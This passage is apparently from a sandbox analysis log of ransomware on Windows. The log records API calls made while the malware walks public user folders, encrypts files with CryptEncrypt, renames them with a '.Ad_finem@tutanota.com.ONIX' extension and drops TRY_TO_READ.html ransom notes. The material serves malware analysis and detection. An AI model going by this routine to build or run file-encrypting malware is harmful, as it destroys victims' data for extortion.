dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.542] CloseHandle (hObject=0x3cc) returned 1 [0122.542] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.542] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x39f)) [0122.542] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.543] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.543] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.543] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Documents9c354ca09c354b444c.lock") returned 49 [0122.543] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\documents9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.543] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.543] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.544] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4bd0 [0122.544] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Documents\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f1f0 [0122.544] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.544] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.544] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4e8 [0122.544] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.544] LockFile (hFile=0x4e8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x116, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.544] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.544] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.544] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.545] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.545] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.545] lstrlenW (lpString="C:\\\\Users\\Public\\Documents\\desktop.ini") returned 38 [0122.545] GetProcessHeap () returned 0x410000 [0122.545] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbc) returned 0x473050 [0122.545] lstrcpyW (in: lpString1=0x473050, lpString2="C:\\\\Users\\Public\\Documents\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini") returned="C:\\\\Users\\Public\\Documents\\desktop.ini" [0122.545] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.545] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=278) returned 1 [0122.545] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x116 [0122.545] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.545] GetProcessHeap () returned 0x410000 [0122.545] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.545] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.545] WriteFile (in: hFile=0x4e8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.547] WriteFile (in: hFile=0x4e8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.548] WriteFile (in: hFile=0x4e8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x116) returned 0x46a198 [0122.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x116) returned 0x46a2b8 [0122.549] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.549] ReadFile (in: hFile=0x4e8, lpBuffer=0x46a198, nNumberOfBytesToRead=0x116, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a198*, lpNumberOfBytesRead=0x367f44c*=0x116, lpOverlapped=0x0) returned 1 [0122.549] SetFilePointer (in: hFile=0x4e8, lDistanceToMove=-278, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.549] WriteFile (in: hFile=0x4e8, lpBuffer=0x46a2b8*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a2b8*, lpNumberOfBytesWritten=0x367f44c*=0x116, lpOverlapped=0x0) returned 1 [0122.552] UnlockFile (hFile=0x4e8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x116, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.552] CloseHandle (hObject=0x4e8) returned 1 [0122.553] GetProcessHeap () returned 0x410000 [0122.553] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.553] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Documents\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\documents\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.555] GetProcessHeap () returned 0x410000 [0122.555] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0122.555] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0122.555] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0122.557] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0122.557] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0122.558] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0122.558] CreateFileW (lpFileName="C:\\\\Users\\Public\\Documents\\My Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\documents\\my videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e8 [0122.559] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.559] FindNextFileW (in: hFindFile=0x48f1f0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3291ee50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.559] CloseHandle (hObject=0x3cc) returned 1 [0122.559] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.559] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x3af)) [0122.559] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.559] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.560] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.560] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Downloads9c354ca09c354b444c.lock") returned 49 [0122.560] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\downloads9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.560] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.560] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.560] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4c18 [0122.560] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Downloads\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f230 [0122.561] FindNextFileW (in: hFindFile=0x48f230, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.561] FindNextFileW (in: hFindFile=0x48f230, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0122.561] CreateFileW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4ec [0122.561] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.561] LockFile (hFile=0x4ec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xae, nNumberOfBytesToLockHigh=0x0) returned 1 [0122.561] SetFilePointerEx (in: hFile=0x4ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0122.561] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.562] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0122.562] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0122.562] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini", dwFileAttributes=0x80) returned 1 [0122.562] lstrlenW (lpString="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned 38 [0122.562] GetProcessHeap () returned 0x410000 [0122.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xbc) returned 0x473050 [0122.562] lstrcpyW (in: lpString1=0x473050, lpString2="C:\\\\Users\\Public\\Downloads\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini" [0122.562] lstrcatW (in: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0122.562] GetFileSizeEx (in: hFile=0x4ec, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=174) returned 1 [0122.562] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xae [0122.562] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0122.562] GetProcessHeap () returned 0x410000 [0122.562] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0122.562] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0122.562] WriteFile (in: hFile=0x4ec, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0122.565] WriteFile (in: hFile=0x4ec, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0122.566] WriteFile (in: hFile=0x4ec, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0122.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x4b3498 [0122.567] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xae) returned 0x4b33e0 [0122.567] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.567] ReadFile (in: hFile=0x4ec, lpBuffer=0x4b3498, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b3498*, lpNumberOfBytesRead=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0122.567] SetFilePointer (in: hFile=0x4ec, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.567] WriteFile (in: hFile=0x4ec, lpBuffer=0x4b33e0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b33e0*, lpNumberOfBytesWritten=0x367f44c*=0xae, lpOverlapped=0x0) returned 1 [0122.568] UnlockFile (hFile=0x4ec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xae, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0122.569] CloseHandle (hObject=0x4ec) returned 1 [0122.570] GetProcessHeap () returned 0x410000 [0122.570] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0122.570] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\Downloads\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\public\\downloads\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0122.575] GetProcessHeap () returned 0x410000 [0122.575] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0122.575] FindNextFileW (in: hFindFile=0x48f230, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0122.575] FindNextFileW (in: hFindFile=0x48f230, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32991270, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32991270, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32991270, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0122.575] CloseHandle (hObject=0x3cc) returned 1 [0122.575] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0122.575] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x1, wMilliseconds=0x3be)) [0122.575] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0122.575] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0122.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0122.576] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public\\Favorites9c354ca09c354b444c.lock") returned 49 [0122.576] CreateFileW (lpFileName="C:\\\\Users\\Public\\Favorites9c354ca09c354b444c.lock" (normalized: "c:\\users\\public\\favorites9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0122.576] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.576] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4b4c60 [0122.576] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\Favorites\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48f270 [0122.577] FindNextFileW (in: hFindFile=0x48f270, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3291ee50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3291ee50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, 